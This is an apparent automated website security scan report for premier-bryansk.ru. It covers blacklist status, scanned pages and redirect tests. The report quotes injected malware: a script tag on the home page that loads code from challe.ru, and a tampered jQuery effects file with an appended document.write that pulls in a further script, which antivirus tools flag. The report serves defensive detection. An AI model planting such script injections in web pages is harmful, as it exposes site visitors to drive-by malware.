Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=premier-bryansk.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://premier-bryansk.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://premier-bryansk.ru/ | 200 OK Content-Length: 7638 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://challe.ru/zhbymnyr.php?id=6931230"></script> | ||
http://premier-bryansk.ru/js/jquery-1.11.1.min.js | 200 OK Content-Length: 95786 Content-Type: application/x-javascript | clean |
http://premier-bryansk.ru/js/jquery.jcarousel.min.js | 200 OK Content-Length: 17169 Content-Type: application/x-javascript | clean |
http://premier-bryansk.ru/js/waypoints.min.js | 200 OK Content-Length: 8044 Content-Type: application/x-javascript | clean |
http://premier-bryansk.ru/js/main.js | 200 OK Content-Length: 1480 Content-Type: application/x-javascript | clean |
http://challe.ru/zhbymnyr.php?id=6931251 | 200 OK Content-Length: 1 Content-Type: text/html | clean |
http://challe.ru/test404page.js | 404 Not Found Content-Length: 83050 Content-Type: text/html | clean |
http://challe.ru/jscookmenu.min.js | 200 OK Content-Length: 19377 Content-Type: application/x-javascript | clean |
http://challe.ru/./index.html | 200 OK Content-Length: 80198 Content-Type: text/html | clean |
http://challe.ru/./jscookmenu.min.js | 200 OK Content-Length: 19377 Content-Type: application/x-javascript | clean |
http://challe.ru/./jquery-1.7.2.min.js | 200 OK Content-Length: 94914 Content-Type: application/x-javascript | clean |
http://challe.ru/./jquery.effects.core.min.js | 200 OK Content-Length: 10685 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery.effects||function(a,b){function c(b){var c;return b&&b.constructor==Array&&b.length==3?b:(c=/rgb\(\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*,\s*([0-9]{1,3})\s*\)/.exec(b))?[parseInt(c[1],10),parseInt(c[2],10),parseInt(c[3],10)]:(c=/rgb\(\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*,\s*([0-9]+(?:\.[0-9]+)?)\%\s*\)/.exec(b))?[parseFloat(c[1])*2.55,parseFloat(c[2])*2.55,parseFloat(c[3])*2.55]:(c=/#([a-fA-F0-9]{2})([a-fA-F0-9]{2})([a-fA-F0-9]{2})/.exec(b))?[parseInt(c ;document.write("<scr"+"ipt src='/css/brisa.js'><"+"/script>"); Antivirus reports:
| ||
http://challe.ru/./wb.carousel.min.js | 200 OK Content-Length: 5206 Content-Type: application/x-javascript | clean |
http://challe.ru/././pack.html | 200 OK Content-Length: 56234 Content-Type: text/html | clean |
http://challe.ru/././jscookmenu.min.js | 200 OK Content-Length: 19377 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: premier-bryansk.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 06 Sep 2014 03:23:24 GMT
Server: nginx/1.4.4
Content-Length: 7638
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.2.17-pl0-gentoo
...7638 bytes of data.
GET / HTTP/1.1
Host: premier-bryansk.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 06 Sep 2014 03:23:24 GMT
Server: nginx/1.4.4
Content-Length: 7638
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.2.17-pl0-gentoo
...7638 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: premier-bryansk.ru
Referer: http://www.google.com/search?q=premier-bryansk.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: premier-bryansk.ru
Referer: http://www.google.com/search?q=premier-bryansk.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.